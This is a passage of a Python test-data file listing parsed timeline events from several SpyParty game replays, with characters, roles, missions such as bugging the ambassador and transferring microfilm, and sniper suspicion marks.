(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Contact,
ActionTest.Green,
),
(
"spy",
"03:01.3",
"banana bread uttered.",
(None,),
(3 * 60 + 01.3),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"03:00.8",
"double agent contacted.",
(Characters.Carlos,),
(3 * 60 + 00.8),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.MissionComplete,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"03:00.3",
"spy leaves conversation.",
(None,),
(3 * 60 + 00.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:00.3",
"spy left conversation with double agent.",
(Characters.Carlos,),
(3 * 60 + 00.3),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:59.9",
"marked less suspicious.",
(Characters.Oprah,),
(2 * 60 + 59.9),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:59.4",
"marked less suspicious.",
(Characters.Smallman,),
(2 * 60 + 59.4),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:55.5",
"marked less suspicious.",
(Characters.Rocker,),
(2 * 60 + 55.5),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:54.6",
"marked neutral suspicion.",
(Characters.Sikh,),
(2 * 60 + 54.6),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:54.5",
"marked less suspicious.",
(Characters.Sikh,),
(2 * 60 + 54.5),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:53.2",
"spy enters conversation.",
(None,),
(2 * 60 + 53.2),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:49.1",
"took last sip of drink.",
(Characters.Alice,),
(2 * 60 + 49.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:44.3",
"spy leaves conversation.",
(None,),
(2 * 60 + 44.3),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:40.2",
"picked up statue.",
(None,),
(2 * 60 + 40.2),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:37.1",
"action triggered: inspect statues",
(None,),
(2 * 60 + 37.1),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"02:36.4",
"action test white: inspect statues",
(None,),
(2 * 60 + 36.4),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Inspect,
ActionTest.White,
),
(
"spy",
"02:32.1",
"left statue inspected.",
(None,),
(2 * 60 + 32.1),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionPartial,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"02:31.8",
"action triggered: inspect statues",
(None,),
(2 * 60 + 31.8),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Inspect,
ActionTest.NoAT,
),
],
),
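# Game 3759441015284876045: setup-only slice at 03:30.0 — role casts, mission selections, and mission enables.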
(
"3759441015284876045",
[
(
"spy",
"03:30.0",
"spy cast.",
(Characters.Taft,),
(3 * 60 + 30.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"ambassador cast.",
(Characters.Morgan,),
(3 * 60 + 30.0),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"double agent cast.",
(Characters.Salmon,),
(3 * 60 + 30.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"suspected double agent cast.",
(Characters.Duke,),
(3 * 60 + 30.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"seduction target cast.",
(Characters.Queen,),
(3 * 60 + 30.0),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Alice,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Teal,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Boots,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Irish,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Plain,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Disney,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Smallman,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Bling,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.Sikh,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"civilian cast.",
(Characters.General,),
(3 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"bug ambassador selected.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"contact double agent selected.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"transfer microfilm selected.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Transfer,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"swap statue selected.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"inspect 3 statues selected.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"seduce target selected.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"purloin guest list selected.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"fingerprint ambassador selected.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"bug ambassador enabled.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"contact double agent enabled.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"transfer microfilm enabled.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Transfer,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"swap statue enabled.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"inspect 3 statues enabled.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"seduce target enabled.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"03:30.0",
"purloin guest list enabled.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Purloin,
ActionTest.NoAT,
),
],
),
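# Game 6173092994452987597: microfilm transfer via books, a red-test fingerprint failure on the briefcase, a standing bug plant, then a missions reset and repeated walking plant attempts.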
(
"6173092994452987597",
[
(
"spy",
"03:30.0",
"fingerprint ambassador enabled.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"game",
"03:30.0",
"game started.",
(None,),
(3 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.GameStart,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:28.9",
"spy player takes control from ai.",
(None,),
(3 * 60 + 28.9),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:22.8",
"took last sip of drink.",
(Characters.Taft,),
(3 * 60 + 22.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:16.8",
"get book from bookcase.",
(None,),
(3 * 60 + 16.8),
None,
(None,),
(Books.Blue,),
TimelineCategory.Books,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"03:14.3",
"action triggered: transfer microfilm",
(None,),
(3 * 60 + 14.3),
None,
(None,),
(None,),
TimelineCategory.Books | TimelineCategory.ActionTriggered,
Missions.Transfer,
ActionTest.NoAT,
),
(
"spy",
"03:13.6",
"action test white: transfer microfilm",
(None,),
(3 * 60 + 13.6),
None,
(None,),
(None,),
TimelineCategory.Books | TimelineCategory.ActionTest,
Missions.Transfer,
ActionTest.White,
),
(
"spy",
"03:10.7",
"remove microfilm from book.",
(None,),
(3 * 60 + 10.7),
None,
(None,),
(Books.Blue, Books.Blue),
TimelineCategory.Books | TimelineCategory.MissionPartial,
Missions.Transfer,
ActionTest.NoAT,
),
(
"spy",
"03:09.1",
"action triggered: transfer microfilm",
(None,),
(3 * 60 + 09.1),
None,
(None,),
(None,),
TimelineCategory.Books | TimelineCategory.ActionTriggered,
Missions.Transfer,
ActionTest.NoAT,
),
(
"spy",
"03:08.1",
"action test green: transfer microfilm",
(None,),
(3 * 60 + 08.1),
None,
(None,),
(None,),
TimelineCategory.Books | TimelineCategory.ActionTest,
Missions.Transfer,
ActionTest.Green,
),
(
"spy",
"03:05.4",
"hide microfilm in book.",
(None,),
(3 * 60 + 05.4),
None,
(None,),
(Books.Blue, Books.Blue),
TimelineCategory.Books | TimelineCategory.MissionPartial,
Missions.Transfer,
ActionTest.NoAT,
),
(
"spy",
"02:53.6",
"put book in bookcase.",
(None,),
(2 * 60 + 53.6),
None,
(None,),
(Books.Blue, Books.Green),
TimelineCategory.Books,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:53.6",
"transferred microfilm.",
(None,),
(2 * 60 + 53.6),
None,
(None,),
(Books.Blue, Books.Green),
TimelineCategory.Books | TimelineCategory.MissionComplete,
Missions.Transfer,
ActionTest.NoAT,
),
(
"spy",
"02:51.7",
"request drink from waiter.",
(Characters.Taft,),
(2 * 60 + 51.7),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:45.3",
"spy picks up briefcase.",
(None,),
(2 * 60 + 45.3),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:45.3",
"picked up fingerprintable briefcase (difficult).",
(None,),
(2 * 60 + 45.3),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"02:41.6",
"action triggered: fingerprint ambassador",
(None,),
(2 * 60 + 41.6),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"02:41.6",
"started fingerprinting briefcase.",
(None,),
(2 * 60 + 41.6),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"02:40.6",
"action test red: fingerprint ambassador",
(None,),
(2 * 60 + 40.6),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Fingerprint,
ActionTest.Red,
),
(
"spy",
"02:40.6",
"fingerprinting failed.",
(None,),
(2 * 60 + 40.6),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"02:36.1",
"action triggered: bug ambassador",
(None,),
(2 * 60 + 36.1),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:36.1",
"begin planting bug while standing.",
(Characters.Morgan,),
(2 * 60 + 36.1),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:34.5",
"bugged ambassador while standing.",
(Characters.Morgan,),
(2 * 60 + 34.5),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.MissionComplete,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:31.6",
"spy puts down briefcase.",
(None,),
(2 * 60 + 31.6),
None,
(None,),
(None,),
TimelineCategory.Briefcase,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:31.2",
"missions reset.",
(None,),
(2 * 60 + 31.2),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:28.1",
"action triggered: bug ambassador",
(None,),
(2 * 60 + 28.1),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:28.1",
"begin planting bug while walking.",
(Characters.Morgan,),
(2 * 60 + 28.1),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:27.0",
"failed planting bug while walking.",
(Characters.Morgan,),
(2 * 60 + 27.0),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:24.4",
"action triggered: bug ambassador",
(None,),
(2 * 60 + 24.4),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:24.4",
"begin planting bug while walking.",
(Characters.Morgan,),
(2 * 60 + 24.4),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.NoCategory,
Missions.Bug,
ActionTest.NoAT,
),
],
),
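# Game 8346478285034783689: statue inspections completed, a 51% flirt, and a guest list purloin finished during a drink handoff, with a run of sniper lights.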
(
"8346478285034783689",
[
(
"spy",
"02:31.0",
"action test white: inspect statues",
(None,),
(2 * 60 + 31.0),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Inspect,
ActionTest.White,
),
(
"spy",
"02:27.8",
"held statue inspected.",
(None,),
(2 * 60 + 27.8),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionPartial,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"02:27.8",
"all statues inspected.",
(None,),
(2 * 60 + 27.8),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionComplete,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"02:27.5",
"put back statue.",
(None,),
(2 * 60 + 27.5),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:23.1",
"marked suspicious.",
(Characters.Boots,),
(2 * 60 + 23.1),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:22.6",
"spy enters conversation.",
(None,),
(2 * 60 + 22.6),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:22.5",
"marked spy suspicious.",
(Characters.Alice,),
(2 * 60 + 22.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:22.1",
"marked neutral suspicion.",
(Characters.Boots,),
(2 * 60 + 22.1),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:17.6",
"action triggered: seduce target",
(None,),
(2 * 60 + 17.6),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:17.6",
"begin flirtation with seduction target.",
(Characters.Oprah,),
(2 * 60 + 17.6),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:16.6",
"action test green: seduce target",
(None,),
(2 * 60 + 16.6),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Green,
),
(
"spy",
"02:16.6",
"flirt with seduction target: 51%",
(Characters.Oprah,),
(2 * 60 + 16.6),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:15.0",
"stopped talking.",
(None,),
(2 * 60 + 15.0),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:51.7",
"request drink from waiter.",
(Characters.Alice,),
(1 * 60 + 51.7),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:47.0",
"waiter offered drink.",
(Characters.Alice,),
(1 * 60 + 47.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:43.3",
"action triggered: purloin guest list",
(None,),
(1 * 60 + 43.3),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"01:42.3",
"action test white: purloin guest list",
(None,),
(1 * 60 + 42.3),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Purloin,
ActionTest.White,
),
(
"spy",
"01:40.6",
"got drink from waiter.",
(Characters.Alice,),
(1 * 60 + 40.6),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:40.6",
"guest list purloined.",
(Characters.Alice,),
(1 * 60 + 40.6),
None,
(Roles.Spy,),
(None,),
TimelineCategory.MissionComplete,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"01:40.6",
"waiter stopped offering drink.",
(Characters.Alice,),
(1 * 60 + 40.6),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:35.9",
"marked neutral suspicion.",
(Characters.Carlos,),
(1 * 60 + 35.9),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:35.5",
"marked suspicious.",
(Characters.Helen,),
(1 * 60 + 35.5),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:34.8",
"sipped drink.",
(Characters.Alice,),
(1 * 60 + 34.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:34.7",
"marked less suspicious.",
(Characters.Salmon,),
(1 * 60 + 34.7),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:33.8",
"marked suspicious.",
(Characters.General,),
(1 * 60 + 33.8),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:32.5",
"marked less suspicious.",
(Characters.Irish,),
(1 * 60 + 32.5),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:32.2",
"marked less suspicious.",
(Characters.Boots,),
(1 * 60 + 32.2),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:31.9",
"marked less suspicious.",
(Characters.Disney,),
(1 * 60 + 31.9),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:31.6",
"flirtation cooldown expired.",
(None,),
(1 * 60 + 31.6),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"sniper",
"01:31.3",
"marked less suspicious.",
(Characters.Queen,),
(1 * 60 + 31.3),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
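# Game -3070462071415144270: repeated waiter/drink interactions, an aborted purloin, a held-statue inspection, and a white-test statue swap around two missions resets.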
(
"-3070462071415144270",
[
(
"spy",
"02:07.8",
"waiter stopped offering drink.",
(Characters.Taft,),
(2 * 60 + 07.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:04.5",
"missions reset.",
(None,),
(2 * 60 + 04.5),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.8",
"gulped drink.",
(Characters.Taft,),
(2 * 60 + 00.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:58.7",
"request drink from waiter.",
(Characters.Taft,),
(1 * 60 + 58.7),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:56.6",
"waiter offered drink.",
(Characters.Taft,),
(1 * 60 + 56.6),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:53.0",
"waiter stopped offering drink.",
(Characters.Taft,),
(1 * 60 + 53.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:52.1",
"waiter gave up.",
(Characters.Taft,),
(1 * 60 + 52.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:49.8",
"request drink from waiter.",
(Characters.Taft,),
(1 * 60 + 49.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:48.1",
"waiter offered drink.",
(Characters.Taft,),
(1 * 60 + 48.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:45.2",
"got drink from waiter.",
(Characters.Taft,),
(1 * 60 + 45.2),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:45.2",
"waiter stopped offering drink.",
(Characters.Taft,),
(1 * 60 + 45.2),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:39.5",
"gulped drink.",
(Characters.Taft,),
(1 * 60 + 39.5),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:37.0",
"request drink from waiter.",
(Characters.Taft,),
(1 * 60 + 37.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:33.7",
"waiter offered drink.",
(Characters.Taft,),
(1 * 60 + 33.7),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:32.4",
"action triggered: purloin guest list",
(None,),
(1 * 60 + 32.4),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"01:31.1",
"action test white: purloin guest list",
(None,),
(1 * 60 + 31.1),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Purloin,
ActionTest.White,
),
(
"spy",
"01:29.8",
"purloin guest list aborted.",
(None,),
(1 * 60 + 29.8),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"01:29.8",
"waiter stopped offering drink.",
(Characters.Taft,),
(1 * 60 + 29.8),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:28.9",
"waiter gave up.",
(Characters.Taft,),
(1 * 60 + 28.9),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:24.4",
"picked up statue.",
(None,),
(1 * 60 + 24.4),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:20.9",
"action triggered: inspect statues",
(None,),
(1 * 60 + 20.9),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:20.0",
"action test green: inspect statues",
(None,),
(1 * 60 + 20.0),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Inspect,
ActionTest.Green,
),
(
"spy",
"01:17.4",
"held statue inspected.",
(None,),
(1 * 60 + 17.4),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionPartial,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:14.5",
"action triggered: swap statue",
(None,),
(1 * 60 + 14.5),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"01:13.3",
"action test white: swap statue",
(None,),
(1 * 60 + 13.3),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Swap,
ActionTest.White,
),
(
"spy",
"01:13.3",
"statue swapped.",
(None,),
(1 * 60 + 13.3),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionComplete,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"01:10.5",
"put back statue.",
(None,),
(1 * 60 + 10.5),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:08.6",
"missions reset.",
(None,),
(1 * 60 + 08.6),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:07.8",
"picked up statue.",
(None,),
(1 * 60 + 07.8),
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:02.3",
"action triggered: swap statue",
(None,),
(1 * 60 + 02.3),
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Swap,
ActionTest.NoAT,
),
],
),
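# Game -5205483914183321949: a standing bug plant triggers the missions-completed countdown, followed by a missions reset, four 45-second time adds, and a green-test statue fingerprint.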
(
"-5205483914183321949",
[
(
"spy",
"00:51.0",
"spy enters conversation.",
(None,),
(00 * 60 + 51.0),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
